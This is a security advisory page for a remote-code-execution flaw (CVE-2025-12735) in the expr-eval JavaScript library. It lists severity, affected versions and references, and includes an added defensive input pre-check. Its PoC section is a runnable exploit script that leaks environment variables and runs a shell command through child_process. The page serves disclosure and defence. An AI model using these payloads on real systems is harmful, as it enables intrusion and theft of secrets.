Security Vulnerability Report
CVE-2025-12735 CVSS 9.8 CRITICAL

CVE-2025-12735

Published: 2025-11-05 01:15:33
Last Modified: 2026-02-10 17:33:25

Description

The expr-eval library is a JavaScript expression parser and evaluator designed to safely evaluate mathematical expressions with user-defined variables. However, due to insufficient input validation, an attacker can pass a crafted context object to evaluate(), or use member access (MEMBER) on the context object from within the expression, and trigger arbitrary code execution.
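A defensive pre-check a caller can put in front of evaluate(), added here as an example; it is not code from the advisory, the PoC or the expr-eval project, and upgrading to a fixed release remains the actual remedy. It assumes the application only needs numbers, strings, booleans and nested arrays or objects of those as variables, and it refuses the two inputs the report describes: a context carrying callables or prototype tricks, and an expression that reaches constructor, __proto__ or prototype through member access.

```javascript
// Added defensive pre-check for callers of expr-eval (written for this page;
// not code from the advisory, the PoC or the expr-eval project).
// Assumption: variables only ever need to be numbers, strings, booleans, or
// nested arrays/objects of those, so anything else is refused up front.

const BLOCKED_NAMES = new Set(['__proto__', 'constructor', 'prototype']);

// Returns null when the context is acceptable, otherwise a string naming the
// first offending path (suitable as a security log line).
function findUnsafeContextEntry(ctx, path = 'context') {
  if (ctx === null || typeof ctx !== 'object') return `${path}: not an object`;
  // An object literal with "__proto__: {...}" swaps the prototype chain.
  const proto = Object.getPrototypeOf(ctx);
  if (proto !== Object.prototype && proto !== Array.prototype && proto !== null) {
    return `${path}: non-standard prototype`;
  }
  for (const key of Object.keys(ctx)) {
    const child = `${path}.${key}`;
    // An own "constructor"/"__proto__" key is the crafted-context shape.
    if (BLOCKED_NAMES.has(key)) return `${child}: blocked property name`;
    const v = ctx[key];
    const t = typeof v;
    if (t === 'function') return `${child}: function-valued variable`;
    if (v !== null && t === 'object') {
      const nested = findUnsafeContextEntry(v, child);
      if (nested) return nested;
    } else if (t !== 'number' && t !== 'string' && t !== 'boolean') {
      return `${child}: unsupported value type ${t}`;
    }
  }
  return null;
}

// Member access (a.b) or string index (a["b"]) to a blocked name anywhere in
// the expression text. Deliberately conservative: it also rejects benign
// variables that happen to carry these names.
const BLOCKED_MEMBER = /(\.\s*|\[\s*["'])(__proto__|constructor|prototype)\b/;

// Null when (expr, ctx) may be handed to evaluate(), else the refusal reason.
function checkEvaluateRequest(expr, ctx) {
  if (typeof expr !== 'string') return 'expression: not a string';
  if (BLOCKED_MEMBER.test(expr)) return 'expression: blocked member access';
  return findUnsafeContextEntry(ctx);
}
```

Log the returned reason and refuse the request; a non-null result from a production caller is itself a detection signal worth alerting on.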

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:jorenbroekema:javascript_expression_evaluator:3.0.0:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:silentmatt:javascript_expression_evaluator:*:*:*:*:*:node.js:*:* - VULNERABLE
silentmatt/expr-eval < 2.0.4
jorenbroekema/expr-eval < 2.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
JavaScript
// CVE-2025-12735 PoC - Remote Code Execution in expr-eval library
// This PoC demonstrates arbitrary code execution via crafted context object
const { Parser } = require('expr-eval');

// Malicious context object designed to trigger RCE
const maliciousContext = {
  // Using constructor property to access Function constructor
  payload: {
    constructor: {
      constructor: Function
    }
  },
  // Alternative: Using __proto__ to access prototype chain
  __proto__: {
    constructor: Function
  }
};

// Attempt to execute arbitrary code
try {
  // Method 1: Direct Function constructor access
  const expr1 = 'this.constructor.constructor("return process.env")()';
  console.log('[+] Testing direct constructor access...');
  const result1 = Parser.evaluate(expr1);
  console.log('[+] Environment variables leaked:', result1);
} catch (e) {
  console.log('[-] Method 1 failed:', e.message);
}

try {
  // Method 2: Using context object with malicious properties
  const expr2 = 'data.constructor.constructor("return process")()';
  console.log('[+] Testing context-based access...');
  const result2 = Parser.evaluate(expr2, { data: maliciousContext });
  console.log('[+] Process object accessed:', Object.keys(result2));
} catch (e) {
  console.log('[-] Method 2 failed:', e.message);
}

try {
  // Method 3: Execute shell command via child_process
  const expr3 = '({}).constructor.constructor("return require(\\"child_process\\").execSync(\\"id\\")")()';
  console.log('[+] Testing command execution...');
  const result3 = Parser.evaluate(expr3);
  console.log('[+] Command output:', result3.toString());
} catch (e) {
  console.log('[-] Method 3 failed:', e.message);
}

// Safe expression (for comparison)
const safeExpr = 'x + y';
console.log('[+] Safe expression result:', Parser.evaluate(safeExpr, { x: 1, y: 2 }));

NVD Record Details

Status: Analyzed
Weakness: CWE-94 (Improper Control of Generation of Code, 'Code Injection')
CPE match for silentmatt/expr-eval: versions up to and including 2.0.2
CPE match for jorenbroekema/expr-eval: version 3.0.0

References

https://github.com/advisories/GHSA-jc85-fpwf-qm7x (Third Party Advisory)
https://github.com/jorenbroekema/expr-eval (Product)
https://github.com/silentmatt/expr-eval (Product)
https://github.com/silentmatt/expr-eval/pull/288 (Issue Tracking, Patch)
https://kb.cert.org/vuls/id/263614 (Third Party Advisory)
https://www.kb.cert.org/vuls/id/263614 (Third Party Advisory)
https://www.npmjs.com/package/expr-eval (Product)
https://www.npmjs.com/package/expr-eval-fork (Product)
https://github.com/jorenbroekema/expr-eval/blob/460b820ba01c5aca6c5d84a7d4f1fa5d1913c67b/test/security.js (Product)